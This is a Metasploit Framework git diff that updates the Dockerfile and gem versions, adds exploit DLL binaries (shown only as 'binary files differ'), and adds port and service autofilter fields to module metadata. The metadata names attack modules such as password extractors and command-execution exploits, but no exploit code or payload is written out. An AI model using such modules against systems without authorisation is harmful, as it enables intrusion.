diff --git a/Dockerfile b/Dockerfile index ddf88768b4..667a197a32 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,9 +1,8 @@ -FROM ruby:2.5.1-alpine3.7 +FROM ruby:2.5.1-alpine3.7 AS builder LABEL maintainer="Rapid7" ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" ENV APP_HOME /usr/src/metasploit-framework/ -ENV NMAP_PRIVILEGED="" ENV BUNDLE_IGNORE_MESSAGES="true" WORKDIR $APP_HOME @@ -12,20 +11,7 @@ COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/vers COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb -RUN apk update && \ - apk add \ - bash \ - sqlite-libs \ - nmap \ - nmap-scripts \ - nmap-nselibs \ - postgresql-libs \ - python \ - python3 \ - ncurses \ - libcap \ - su-exec \ - && apk add --virtual .ruby-builddeps \ +RUN apk add --no-cache \ autoconf \ bison \ build-base \ @@ -44,15 +30,28 @@ RUN apk update && \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && gem update --system \ && gem install bundler \ - && bundle install --system $BUNDLER_ARGS \ - && apk del .ruby-builddeps \ - && rm -rf /var/cache/apk/* + && bundle install --clean --no-cache --system $BUNDLER_ARGS \ + # temp fix for https://github.com/bundler/bundler/issues/6680 + && rm -rf /usr/local/bundle/cache \ + # needed so non root users can read content of the bundle + && chmod -R a+r /usr/local/bundle + + +FROM ruby:2.5.1-alpine3.7 +LABEL maintainer="Rapid7" + +ENV APP_HOME /usr/src/metasploit-framework/ +ENV NMAP_PRIVILEGED="" + +COPY --from=builder /usr/local/bundle /usr/local/bundle +COPY . $APP_HOME + +RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby) RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap) -ADD ./ $APP_HOME - +WORKDIR $APP_HOME # we need this entrypoint to dynamically create a user # matching the hosts UID and GID so we can mount something # from the users home directory. If the IDs don't match diff --git a/Gemfile.lock b/Gemfile.lock index 05c7bb2d48..ff09d5f350 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -10,6 +10,7 @@ PATH bcrypt_pbkdf bit-struct dnsruby + ed25519 faker filesize jsobfu @@ -18,7 +19,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.47) + metasploit-payloads (= 1.3.52) metasploit_data_models metasploit_payloads-mettle (= 0.4.2) mqtt @@ -112,7 +113,7 @@ GEM backports (3.11.4) bcrypt (3.1.12) bcrypt_pbkdf (1.0.0) - bindata (2.4.3) + bindata (2.4.4) bit-struct (0.16) builder (3.2.3) coderay (1.1.2) @@ -123,6 +124,7 @@ GEM dnsruby (1.61.2) addressable (~> 2.5) docile (1.3.1) + ed25519 (1.2.4) erubis (2.7.0) eventmachine (1.2.7) factory_bot (4.11.1) @@ -164,7 +166,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.47) + metasploit-payloads (1.3.52) metasploit_data_models (3.0.0) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -232,7 +234,7 @@ GEM thor (>= 0.18.1, < 2.0) rake (12.3.1) rb-readline (0.5.5) - recog (2.1.22) + recog (2.1.24) nokogiri redcarpet (3.4.0) rex-arch (0.1.13) @@ -305,7 +307,7 @@ GEM rspec-rerun (1.1.0) rspec (~> 3.0) rspec-support (3.8.0) - ruby-macho (2.0.0) + ruby-macho (2.1.0) ruby-rc4 (0.1.5) ruby_smb (1.0.4) bindata diff --git a/data/exploits/mysql/lib_mysqludf_sys_32.dll b/data/exploits/mysql/lib_mysqludf_sys_32.dll index 0ea90105d4..2a3ef0e056 100755 Binary files a/data/exploits/mysql/lib_mysqludf_sys_32.dll and b/data/exploits/mysql/lib_mysqludf_sys_32.dll differ diff --git a/data/exploits/mysql/lib_mysqludf_sys_64.dll b/data/exploits/mysql/lib_mysqludf_sys_64.dll index 3de734fc9f..773af57df3 100755 Binary files a/data/exploits/mysql/lib_mysqludf_sys_64.dll and b/data/exploits/mysql/lib_mysqludf_sys_64.dll differ diff --git a/data/exploits/rottenpotato/rottenpotato.x64.dll b/data/exploits/rottenpotato/rottenpotato.x64.dll new file mode 100644 index 0000000000..d035d1a151 Binary files /dev/null and b/data/exploits/rottenpotato/rottenpotato.x64.dll differ diff --git a/data/exploits/rottenpotato/rottenpotato.x86.dll b/data/exploits/rottenpotato/rottenpotato.x86.dll new file mode 100644 index 0000000000..9da2efd5d8 Binary files /dev/null and b/data/exploits/rottenpotato/rottenpotato.x86.dll differ diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb index b9fde0462c..76174bafca 100644 --- a/data/markdown_doc/default_template.erb +++ b/data/markdown_doc/default_template.erb @@ -14,10 +14,22 @@ <%= normalize_platforms(items[:mod_platforms]) %> <% end %> -## Reliability +## Module Ranking <%= normalize_rank(items[:mod_rank]) %> +## Side Effects + +<%= normalize_side_effects(items[:mod_side_effects]) %> + +## Reliability + +<%= normalize_reliability(items[:mod_reliability]) %> + +## Stability + +<%= normalize_stability(items[:mod_stability]) %> + ## Related Pull Requests <%= normalize_pull_requests(items[:mod_pull_requests]) %> diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 94af409883..94345f86ee 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -21,6 +21,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/2wire/xslt_password_reset.rb", @@ -54,6 +69,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb", @@ -84,6 +105,21 @@ "platform": "", "arch": "", "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/appletv/appletv_display_image.rb", @@ -114,6 +150,21 @@ "platform": "", "arch": "", "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/appletv/appletv_display_video.rb", @@ -149,6 +200,12 @@ "platform": "", "arch": "", "rport": 10001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/atg/atg_client.rb", @@ -179,6 +236,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/aws/aws_launch_instances.rb", @@ -212,6 +275,12 @@ "platform": "", "arch": "", "rport": 10000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/backupexec/dump.rb", @@ -243,6 +312,12 @@ "platform": "", "arch": "", "rport": 6106, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/backupexec/registry.rb", @@ -272,6 +347,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/chromecast/chromecast_reset.rb", @@ -301,6 +391,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb", @@ -339,6 +444,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb", @@ -370,6 +481,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb", @@ -402,6 +528,12 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb", @@ -433,6 +565,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/db2/db2rcmd.rb", @@ -466,6 +606,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb", @@ -496,6 +642,12 @@ "platform": "", "arch": "", "rport": 8030, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-08 19:00:11 +0000", "path": "/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb", @@ -529,6 +681,21 @@ "platform": "", "arch": "", "rport": 8028, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb", @@ -561,6 +728,12 @@ "platform": "", "arch": "", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb", @@ -593,6 +766,12 @@ "platform": "", "arch": "", "rport": 3500, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb", @@ -623,6 +802,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb", @@ -658,6 +852,12 @@ "platform": "", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb", @@ -690,6 +890,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-03-16 16:46:50 +0000", "path": "/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb", @@ -724,6 +939,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb", @@ -758,6 +988,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb", @@ -790,6 +1035,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb", @@ -822,6 +1073,21 @@ "platform": "", "arch": "", "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/axigen_file_access.rb", @@ -853,6 +1119,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb", @@ -883,6 +1164,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:53:02 +0000", "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb", @@ -913,6 +1209,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:53:02 +0000", "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb", @@ -943,6 +1254,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb", @@ -976,6 +1302,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb", @@ -1008,6 +1349,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb", @@ -1039,6 +1395,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb", @@ -1073,6 +1444,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb", @@ -1105,6 +1491,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-03-09 07:43:12 +0000", "path": "/modules/auxiliary/admin/http/gitstack_rest.rb", @@ -1136,6 +1537,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb", @@ -1169,6 +1585,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/iis_auth_bypass.rb", @@ -1202,6 +1633,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-08 19:00:11 +0000", "path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb", @@ -1232,6 +1678,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb", @@ -1264,6 +1725,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb", @@ -1296,6 +1772,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb", @@ -1327,6 +1818,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb", @@ -1362,6 +1868,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb", @@ -1394,6 +1915,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb", @@ -1425,6 +1961,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb", @@ -1457,6 +2008,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb", @@ -1489,6 +2055,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb", @@ -1521,6 +2102,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb", @@ -1554,6 +2150,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb", @@ -1586,6 +2197,21 @@ "platform": "", "arch": "", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb", @@ -1618,6 +2244,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb", @@ -1650,6 +2291,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/manageengine_file_download.rb", @@ -1682,6 +2338,21 @@ "platform": "", "arch": "", "rport": 7272, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb", @@ -1715,6 +2386,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb", @@ -1746,6 +2432,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb", @@ -1778,6 +2479,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/netflow_file_download.rb", @@ -1810,6 +2526,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/netgear_auth_download.rb", @@ -1843,6 +2574,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb", @@ -1876,6 +2622,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb", @@ -1907,6 +2668,21 @@ "platform": "", "arch": "", "rport": 3780, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb", @@ -1939,6 +2715,21 @@ "platform": "", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb", @@ -1971,6 +2762,21 @@ "platform": "", "arch": "", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb", @@ -2003,6 +2809,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb", @@ -2034,6 +2855,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-30 13:03:36 +0000", "path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb", @@ -2070,6 +2906,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb", @@ -2099,6 +2950,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/scadabr_credential_dump.rb", @@ -2133,6 +2999,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb", @@ -2168,6 +3049,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb", @@ -2199,6 +3095,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb", @@ -2231,6 +3142,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/sysaid_file_download.rb", @@ -2263,6 +3189,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], 